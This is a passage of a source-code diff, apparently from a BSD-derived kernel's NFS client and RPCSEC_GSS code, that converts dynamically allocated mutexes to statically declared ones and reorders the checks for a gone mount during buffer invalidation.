NB_DONE); /* note that it's done */ nfs_buf_release(bp, 1); } else { /* or just wakeup the buffer */ - 
lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); SET(bp->nb_flags, NB_DONE); /* note that it's done */ CLR(bp->nb_lflags, NBL_WANTED); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(bp); } @@ -1371,14 +1368,14 @@ nfs_buf_write_delayed(struct nfsbuf *bp) if (!ISSET(bp->nb_flags, NB_DELWRI)) { SET(bp->nb_flags, NB_DELWRI); /* move to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite++; NFSBUFCNTCHK(); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } /* @@ -1489,7 +1486,7 @@ nfs_buf_acquire(struct nfsbuf *bp, int flags, int slpflag, int slptimeo) /* the hz value is 100; which leads to 10ms */ ts.tv_nsec = (slptimeo % 100) * 10 * NSEC_PER_USEC * 1000; - error = msleep(bp, nfs_buf_mutex, slpflag | (PRIBIO + 1), + error = msleep(bp, &nfs_buf_mutex, slpflag | (PRIBIO + 1), "nfs_buf_acquire", &ts); if (error) { return error; @@ -1551,7 +1548,7 @@ nfs_buf_iterprepare(nfsnode_t np, struct nfsbuflists *iterheadp, int flags) while (np->n_bufiterflags & NBI_ITER) { np->n_bufiterflags |= NBI_ITERWANT; - msleep(&np->n_bufiterflags, nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL); + msleep(&np->n_bufiterflags, &nfs_buf_mutex, 0, "nfs_buf_iterprepare", NULL); } if (LIST_EMPTY(listheadp)) { LIST_INIT(iterheadp); @@ -1778,19 +1775,19 @@ nfs_buf_read_rpc(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) SET(bp->nb_flags, NB_ERROR); if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) { nrpcs = (length + nmrsize - 1) / nmrsize; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp->nb_rpcs -= nrpcs; if (bp->nb_rpcs == 0) { /* No RPCs left, so the buffer's done */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_iodone(bp); } else { /* wait for the last RPC to mark it done */ while (bp->nb_rpcs > 0) { - msleep(&bp->nb_rpcs, nfs_buf_mutex, 
0, + msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0, "nfs_buf_read_rpc_cancel", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { nfs_buf_iodone(bp); @@ -1993,14 +1990,14 @@ out: multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC); if (multasyncrpc) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } bp->nb_rpcs--; finished = (bp->nb_rpcs == 0); if (multasyncrpc) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } if (finished) { @@ -2513,21 +2510,21 @@ nfs_buf_write(struct nfsbuf *bp) CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI)); if (ISSET(oldflags, NB_DELWRI)) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite--; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(&nfs_nbdwrite); } /* move to clean list */ if (ISSET(oldflags, (NB_ASYNC | NB_DELWRI))) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } nfs_node_lock_force(np); np->n_numoutput++; @@ -2694,12 +2691,12 @@ out: error = nfs_buf_iowait(bp); /* move to clean list */ if (oldflags & NB_DELWRI) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } FSDBG_BOT(553, bp, NBOFF(bp), bp->nb_flags, error); nfs_buf_release(bp, 1); @@ -2801,10 +2798,10 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) CLR(bp->nb_flags, NB_INVAL); if (!ISSET(bp->nb_flags, NB_DELWRI)) { SET(bp->nb_flags, NB_DELWRI); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite++; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + 
lck_mtx_unlock(&nfs_buf_mutex); } /* * Since for the NB_ASYNC case, we've reassigned the buffer to the @@ -2812,12 +2809,12 @@ nfs_buf_write_finish(struct nfsbuf *bp, thread_t thd, kauth_cred_t cred) */ if (ISSET(bp->nb_flags, NB_ASYNC)) { /* move to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (bp->nb_vnbufs.le_next != NFSNOLIST) { LIST_REMOVE(bp, nb_vnbufs); } LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { /* either there's an error or we don't need to commit */ @@ -3051,19 +3048,19 @@ nfs_buf_write_rpc(struct nfsbuf *bp, int iomode, thread_t thd, kauth_cred_t cred SET(bp->nb_flags, NB_ERROR); if (ISSET(bp->nb_flags, NB_MULTASYNCRPC)) { nrpcs = (length + nmwsize - 1) / nmwsize; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); bp->nb_rpcs -= nrpcs; if (bp->nb_rpcs == 0) { /* No RPCs left, so the buffer's done */ - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_write_finish(bp, thd, cred); } else { /* wait for the last RPC to mark it done */ while (bp->nb_rpcs > 0) { - msleep(&bp->nb_rpcs, nfs_buf_mutex, 0, + msleep(&bp->nb_rpcs, &nfs_buf_mutex, 0, "nfs_buf_write_rpc_cancel", NULL); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } else { nfs_buf_write_finish(bp, thd, cred); @@ -3284,14 +3281,14 @@ out: */ multasyncrpc = ISSET(bp->nb_flags, NB_MULTASYNCRPC); if (multasyncrpc) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } bp->nb_rpcs--; finished = (bp->nb_rpcs == 0); if (multasyncrpc) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } if (finished) { @@ -3364,7 +3361,7 @@ nfs_flushcommits(nfsnode_t np, int nowait) if (nowait) { flags |= NBI_NOWAIT; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); wverf = nmp->nm_verf; if (!nfs_buf_iterprepare(np, &blist, flags)) { while ((bp = LIST_FIRST(&blist))) { @@ -3439,7 +3436,7 @@ 
nfs_flushcommits(nfsnode_t np, int nowait) } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (LIST_EMPTY(&commitlist)) { error = ENOBUFS; @@ -3514,9 +3511,9 @@ nfs_flushcommits(nfsnode_t np, int nowait) if (retv) { /* move back to dirty list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_INSERT_HEAD(&np->n_dirtyblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_buf_release(bp, 1); continue; } @@ -3526,10 +3523,10 @@ nfs_flushcommits(nfsnode_t np, int nowait) nfs_node_unlock(np); vnode_startwrite(NFSTOV(np)); if (ISSET(bp->nb_flags, NB_DELWRI)) { - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_nbdwrite--; NFSBUFCNTCHK(); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); wakeup(&nfs_nbdwrite); } CLR(bp->nb_flags, (NB_READ | NB_DONE | NB_ERROR | NB_DELWRI)); @@ -3543,9 +3540,9 @@ nfs_flushcommits(nfsnode_t np, int nowait) } /* move to clean list */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); LIST_INSERT_HEAD(&np->n_cleanblkhd, bp, nb_vnbufs); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); bp->nb_dirtyoff = bp->nb_dirtyend = 0; @@ -3593,13 +3590,13 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr) nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (np->n_bflag & NBFLUSHINPROG) { np->n_bflag |= NBFLUSHWANT; - error = msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_flush", NULL); + error = msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_flush", NULL); if ((error && (error != EWOULDBLOCK)) || ((error = nfs_sigintr(NFSTONMP(np), NULL, thd, 0)))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); goto out; } } @@ -3615,7 +3612,7 @@ nfs_flush(nfsnode_t np, int waitfor, thread_t thd, int ignore_writeerr) again: FSDBG(518, LIST_FIRST(&np->n_dirtyblkhd), np->n_flag, 0, 0); if 
(!NFSTONMP(np)) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); error = ENXIO; goto done; } @@ -3641,7 +3638,7 @@ again: nfs_buf_refrele(bp); } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); error = error2; goto done; } @@ -3677,14 +3674,14 @@ again: continue; } nfs_buf_remfree(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (ISSET(bp->nb_flags, NB_ERROR)) { nfs_node_lock_force(np); np->n_error = bp->nb_error ? bp->nb_error : EIO; np->n_flag |= NWRITEERR; nfs_node_unlock(np); nfs_buf_release(bp, 1); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); continue; } SET(bp->nb_flags, NB_ASYNC); @@ -3693,11 +3690,11 @@ again: SET(bp->nb_flags, NB_STABLE); } nfs_buf_write(bp); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (waitfor == MNT_WAIT || waitfor == MNT_DWAIT) { while ((error = vnode_waitforwrites(NFSTOV(np), 0, slpflag, slptimeo, "nfsflush"))) { @@ -3730,7 +3727,7 @@ again: np->n_flag |= NMODIFIED; nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); goto again; } @@ -3740,11 +3737,11 @@ again: np->n_flag |= NMODIFIED; nfs_node_unlock(np); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!LIST_EMPTY(&np->n_dirtyblkhd)) { goto again; } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_node_lock_force(np); /* * OK, it looks like there are no dirty blocks. 
If we have no @@ -3775,10 +3772,10 @@ again: } nfs_node_unlock(np); done: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); flags = np->n_bflag; np->n_bflag &= ~(NBFLUSHINPROG | NBFLUSHWANT); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (flags & NBFLUSHWANT) { wakeup(&np->n_bflag); } @@ -3810,7 +3807,7 @@ nfs_vinvalbuf_internal( } } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); for (;;) { list = NBI_CLEAN; if (nfs_buf_iterprepare(np, &blist, list)) { @@ -3833,13 +3830,13 @@ nfs_vinvalbuf_internal( FSDBG(554, np, bp, -1, error); nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, list); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } } nfs_buf_refrele(bp); FSDBG(554, np, bp, NBOFF(bp), bp->nb_flags); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if ((flags & V_SAVE) && UBCINFOEXISTS(NFSTOV(np)) && bp->nb_np && (NBOFF(bp) < (off_t)np->n_size)) { /* extra paranoia: make sure we're not */ @@ -3921,28 +3918,28 @@ nfs_vinvalbuf_internal( * be stuck in this loop forever because * the buffer will continue to stay dirty. 
*/ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nfs_buf_itercomplete(np, &blist, list); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } error = 0; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); continue; } } SET(bp->nb_flags, NB_INVAL); // hold off on FREEUPs until we're done here nfs_buf_release(bp, 0); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); } nfs_buf_itercomplete(np, &blist, list); } if (!LIST_EMPTY(&(np)->n_dirtyblkhd) || !LIST_EMPTY(&(np)->n_cleanblkhd)) { panic("nfs_vinvalbuf: flush/inval failed"); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_node_lock_force(np); if (!(flags & V_SAVE)) { np->n_flag &= ~NMODIFIED; @@ -3978,15 +3975,6 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf FSDBG_TOP(554, np, flags, intrflg, 0); - /* - * If the mount is gone no sense to try and write anything. - * and hang trying to do IO. - */ - if (nfs_mount_gone(nmp)) { - flags &= ~V_SAVE; - ubcflags &= ~UBC_PUSHALL; - } - if (nmp && !NMFLAG(nmp, INTR)) { intrflg = 0; } @@ -3999,12 +3987,12 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf } /* First wait for any other process doing a flush to complete. */ - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); while (np->n_bflag & NBINVALINPROG) { np->n_bflag |= NBINVALWANT; - msleep(&np->n_bflag, nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts); + msleep(&np->n_bflag, &nfs_buf_mutex, slpflag, "nfs_vinvalbuf", &ts); if ((error = nfs_sigintr(VTONMP(vp), NULL, thd, 0))) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return error; } if (np->n_bflag & NBINVALINPROG) { @@ -4012,10 +4000,15 @@ nfs_vinvalbuf2(vnode_t vp, int flags, thread_t thd, kauth_cred_t cred, int intrf } } np->n_bflag |= NBINVALINPROG; - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); /* Now, flush as required. 
*/ again: + /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */ + if (nfs_mount_gone(nmp)) { + flags &= ~V_SAVE; + } + error = nfs_vinvalbuf_internal(np, flags, thd, cred, slpflag, 0); while (error) { FSDBG(554, np, 0, 0, error); @@ -4025,6 +4018,11 @@ again: error = nfs_vinvalbuf_internal(np, flags, thd, cred, 0, slptimeo); } + /* If the mount is gone no sense to try and write anything. and hang trying to do IO. */ + if (nfs_mount_gone(nmp)) { + ubcflags &= ~UBC_PUSHALL; + } + /* get the pages out of vm also */ if (UBCINFOEXISTS(vp) && (size = ubc_getsize(vp))) { if ((error = ubc_msync(vp, 0, size, NULL, ubcflags))) { @@ -4042,10 +4040,10 @@ again: } } done: - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); nflags = np->n_bflag; np->n_bflag &= ~(NBINVALINPROG | NBINVALWANT); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (nflags & NBINVALWANT) { wakeup(&np->n_bflag); } @@ -4064,7 +4062,7 @@ nfs_wait_bufs(nfsnode_t np) struct nfsbuflists blist; int error = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!nfs_buf_iterprepare(np, &blist, NBI_CLEAN)) { while ((bp = LIST_FIRST(&blist))) { LIST_REMOVE(bp, nb_vnbufs); @@ -4074,7 +4072,7 @@ nfs_wait_bufs(nfsnode_t np) if (error != EAGAIN) { nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, NBI_CLEAN); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } } @@ -4092,7 +4090,7 @@ nfs_wait_bufs(nfsnode_t np) if (error != EAGAIN) { nfs_buf_refrele(bp); nfs_buf_itercomplete(np, &blist, NBI_DIRTY); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); return; } } @@ -4101,7 +4099,7 @@ nfs_wait_bufs(nfsnode_t np) } nfs_buf_itercomplete(np, &blist, NBI_DIRTY); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } @@ -4124,7 +4122,7 @@ again: return; } - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); niod = nmp->nm_niod; /* grab an nfsiod if we don't have one already */ 
@@ -4140,12 +4138,12 @@ again: * We may try a couple times if other callers * get the new threads before we do. */ - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); started++; if (!nfsiod_start()) { goto again; } - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); } } @@ -4179,23 +4177,23 @@ again: if (!nmp->nm_niod) { if (niod) { /* give it the nfsiod we just grabbed */ nmp->nm_niod = niod; - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); wakeup(niod); } else if (nfsiod_thread_count > 0) { /* just queue it up on nfsiod mounts queue if needed */ if (nmp->nm_iodlink.tqe_next == NFSNOLIST) { TAILQ_INSERT_TAIL(&nfsiodmounts, nmp, nm_iodlink); } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } else { printf("nfs_asyncio(): no nfsiods? %d %d (%d)\n", nfsiod_thread_count, NFSIOD_MAX, started); - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); /* we have no other option but to be persistent */ started = 0; goto again; } } else { - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } FSDBG_BOT(552, nmp, 0, 0, 0); diff --git a/bsd/nfs/nfs_gss.c b/bsd/nfs/nfs_gss.c index 42f8ea0ac..2d90650f0 100644 --- a/bsd/nfs/nfs_gss.c +++ b/bsd/nfs/nfs_gss.c @@ -126,14 +126,14 @@ #if CONFIG_NFS_SERVER u_long nfs_gss_svc_ctx_hash; struct nfs_gss_svc_ctx_hashhead *nfs_gss_svc_ctx_hashtbl; -lck_mtx_t *nfs_gss_svc_ctx_mutex; -lck_grp_t *nfs_gss_svc_grp; +static LCK_GRP_DECLARE(nfs_gss_svc_grp, "rpcsec_gss_svc"); +static LCK_MTX_DECLARE(nfs_gss_svc_ctx_mutex, &nfs_gss_svc_grp); uint32_t nfsrv_gss_context_ttl = GSS_CTX_EXPIRE; #define GSS_SVC_CTX_TTL ((uint64_t)max(2*GSS_CTX_PEND, nfsrv_gss_context_ttl) * NSEC_PER_SEC) #endif /* CONFIG_NFS_SERVER */ #if CONFIG_NFS_CLIENT -lck_grp_t *nfs_gss_clnt_grp; +LCK_GRP_DECLARE(nfs_gss_clnt_grp, "rpcsec_gss_clnt"); #endif /* CONFIG_NFS_CLIENT */ #define KRB5_MAX_MIC_SIZE 128 @@ -186,15 +186,8 @@ const uint32_t nfs_gss_ctx_max = GSS_SVC_MAXCONTEXTS; void 
nfs_gss_init(void) { -#if CONFIG_NFS_CLIENT - nfs_gss_clnt_grp = lck_grp_alloc_init("rpcsec_gss_clnt", LCK_GRP_ATTR_NULL); -#endif /* CONFIG_NFS_CLIENT */ - #if CONFIG_NFS_SERVER - nfs_gss_svc_grp = lck_grp_alloc_init("rpcsec_gss_svc", LCK_GRP_ATTR_NULL); - nfs_gss_svc_ctx_hashtbl = hashinit(SVC_CTX_HASHSZ, M_TEMP, &nfs_gss_svc_ctx_hash); - nfs_gss_svc_ctx_mutex = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL); nfs_gss_svc_ctx_timer_call = thread_call_allocate(nfs_gss_svc_ctx_timer, NULL); #endif /* CONFIG_NFS_SERVER */ @@ -537,12 +530,12 @@ nfs_gss_clnt_ctx_dump(struct nfsmount *nmp) lck_mtx_lock(&nmp->nm_lock); NFS_GSS_DBG("Enter\n"); TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); printf("context %d/%d: refcnt = %d, flags = %x\n", kauth_cred_getasid(cp->gss_clnt_cred), kauth_cred_getauid(cp->gss_clnt_cred), cp->gss_clnt_refcnt, cp->gss_clnt_flags); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } NFS_GSS_DBG("Exit\n"); lck_mtx_unlock(&nmp->nm_lock); @@ -676,12 +669,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p microuptime(&now); lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, req->r_cred)) { @@ -698,7 +691,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p bcmp(cp->gss_clnt_principal, principal, plen) != 0) { cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); NFS_GSS_DBG("Marking %s for 
deletion because %s does not match\n", NFS_GSS_CTX(req, cp), principal); NFS_GSS_DBG("len = (%zu,%zu), nt = (%d,%d)\n", cp->gss_clnt_prinlen, plen, @@ -717,7 +710,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p if (cp->gss_clnt_nctime + GSS_NEG_CACHE_TO >= now.tv_sec || cp->gss_clnt_nctime == 0) { NFS_GSS_DBG("Context %s (refcnt = %d) not expired returning EAUTH nctime = %ld now = %ld\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt, cp->gss_clnt_nctime, now.tv_sec); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); return NFSERR_EAUTH; @@ -733,7 +726,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p NFS_GSS_DBG("Context %s has expired but we still have %d references\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); error = nfs_gss_clnt_ctx_copy(cp, &ncp); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (error) { lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); @@ -745,7 +738,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p if (cp->gss_clnt_nctime) { nmp->nm_ncentries--; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); break; } @@ -753,12 +746,12 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p /* Found a valid context to return */ cp->gss_clnt_refcnt++; req->r_gss_ctx = cp; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); lck_mtx_unlock(&nmp->nm_lock); NFS_ZFREE(nfs_req_zone, treq); return 0; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } if (!cp && nfs_root_steals_ctx && principal == NULL && kauth_cred_getuid(req->r_cred) == 0) { @@ -798,7 +791,7 @@ nfs_gss_clnt_ctx_find_principal(struct nfsreq *req, uint8_t *principal, size_t p } cp->gss_clnt_cred = req->r_cred; 
kauth_cred_ref(cp->gss_clnt_cred); - cp->gss_clnt_mtx = lck_mtx_alloc_init(nfs_gss_clnt_grp, LCK_ATTR_NULL); + lck_mtx_init(&cp->gss_clnt_mtx, &nfs_gss_clnt_grp, LCK_ATTR_NULL); cp->gss_clnt_ptime = now.tv_sec - GSS_PRINT_DELAY; if (principal) { MALLOC(cp->gss_clnt_principal, uint8_t *, plen + 1, M_TEMP, M_WAITOK | M_ZERO); @@ -905,10 +898,10 @@ retry: * doing the context setup. Wait until the context thread * is null. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_thread && cp->gss_clnt_thread != current_thread()) { cp->gss_clnt_flags |= GSS_NEEDCTX; - msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL); + msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "ctxwait", NULL); slpflag &= ~PCATCH; if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) { return error; @@ -916,7 +909,7 @@ retry: nfs_gss_clnt_ctx_unref(req); goto retry; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_COMPLETE) { /* @@ -926,26 +919,26 @@ retry: * we allocate a new sequence number and allow this request * to proceed. 
*/ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); while (win_getbit(cp->gss_clnt_seqbits, ((cp->gss_clnt_seqnum - cp->gss_clnt_seqwin) + 1) % cp->gss_clnt_seqwin)) { cp->gss_clnt_flags |= GSS_NEEDSEQ; - msleep(cp, cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL); + msleep(cp, &cp->gss_clnt_mtx, slpflag | PDROP, "seqwin", NULL); slpflag &= ~PCATCH; if ((error = nfs_sigintr(req->r_nmp, req, req->r_thread, 0))) { return error; } - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_INVAL) { /* Renewed while while we were waiting */ - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); goto retry; } } seqnum = ++cp->gss_clnt_seqnum; win_setbit(cp->gss_clnt_seqbits, seqnum % cp->gss_clnt_seqwin); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); MALLOC(gsp, struct gss_seq *, sizeof(*gsp), M_TEMP, M_WAITOK | M_ZERO); if (gsp == NULL) { @@ -1489,9 +1482,9 @@ retry: /* * The context is apparently established successfully */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= GSS_CTX_COMPLETE; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); cp->gss_clnt_proc = RPCSEC_GSS_DATA; network_seqnum = htonl(cp->gss_clnt_seqwin); @@ -1543,7 +1536,7 @@ nfsmout: * It will be removed when the reference count * drops to zero. 
